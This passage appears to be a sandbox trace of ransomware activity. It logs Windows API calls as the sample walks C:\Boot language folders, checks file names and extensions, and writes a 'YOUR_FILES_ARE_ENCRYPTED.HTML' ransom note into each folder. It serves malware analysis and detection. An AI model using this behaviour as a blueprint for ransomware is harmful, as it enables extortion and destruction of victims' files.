lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.173] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.173] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0155.173] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.173] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.173] lstrlenW (lpString=".mui") returned 4 [0155.173] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.173] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.173] FindClose (in: hFindFile=0x42f3100 | out: 
hFindFile=0x42f3100) returned 1 [0155.173] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.173] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.174] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.176] CloseHandle (hObject=0x4a4) returned 1 [0155.176] GetProcessHeap () returned 0x270000 [0155.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.177] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0155.177] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0155.177] GetProcessHeap () returned 0x270000 [0155.177] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.177] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\pt-PT" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT") returned="\\\\?\\C:\\Boot\\pt-PT" [0155.177] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Boot\\pt-PT\\*") returned="\\\\?\\C:\\Boot\\pt-PT\\*" [0155.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.178] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.178] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.178] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0155.178] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.178] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.178] 
lstrlenW (lpString=".mui") returned 4 [0155.178] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.178] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.178] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.179] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.179] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.179] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.181] CloseHandle (hObject=0x4a4) returned 1 [0155.181] GetProcessHeap () returned 0x270000 [0155.182] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.182] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, 
ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0155.182] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0155.182] GetProcessHeap () returned 0x270000 [0155.182] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.182] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\ru-RU" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU") returned="\\\\?\\C:\\Boot\\ru-RU" [0155.182] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\*") returned="\\\\?\\C:\\Boot\\ru-RU\\*" [0155.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.182] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.182] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, 
ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.182] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0155.183] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.183] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.183] lstrlenW (lpString=".mui") returned 4 [0155.183] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.183] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.183] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.183] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.183] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ru-ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.183] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.185] CloseHandle (hObject=0x4a4) returned 1 [0155.186] GetProcessHeap () returned 0x270000 [0155.186] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.186] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0155.186] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0155.186] GetProcessHeap () returned 0x270000 [0155.186] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.187] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\sv-SE" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE") returned="\\\\?\\C:\\Boot\\sv-SE" [0155.187] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\*") returned="\\\\?\\C:\\Boot\\sv-SE\\*" [0155.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) 
returned 0x42f3100 [0155.188] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.188] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.188] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0155.188] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.188] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.188] lstrlenW (lpString=".mui") returned 4 [0155.188] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.188] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.188] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.188] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.188] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sv-se\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.188] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.190] CloseHandle (hObject=0x4a4) returned 1 [0155.191] GetProcessHeap () returned 0x270000 [0155.191] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0155.191] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0155.191] GetProcessHeap () returned 0x270000 [0155.191] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.191] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\tr-TR" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR") 
returned="\\\\?\\C:\\Boot\\tr-TR" [0155.192] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\*") returned="\\\\?\\C:\\Boot\\tr-TR\\*" [0155.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.192] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.192] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.192] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0155.192] lstrcmpW (lpString1="bootmgr.exe.mui", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.192] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.192] lstrlenW (lpString=".mui") returned 4 [0155.192] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.192] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.192] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.192] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.192] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\tr-tr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.193] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.195] CloseHandle (hObject=0x4a4) returned 1 [0155.195] GetProcessHeap () returned 0x270000 [0155.196] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.196] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, 
ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0155.196] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0155.196] GetProcessHeap () returned 0x270000 [0155.196] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.196] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\zh-CN" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN") returned="\\\\?\\C:\\Boot\\zh-CN" [0155.196] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\*") returned="\\\\?\\C:\\Boot\\zh-CN\\*" [0155.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.197] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.197] FindNextFileW (in: 
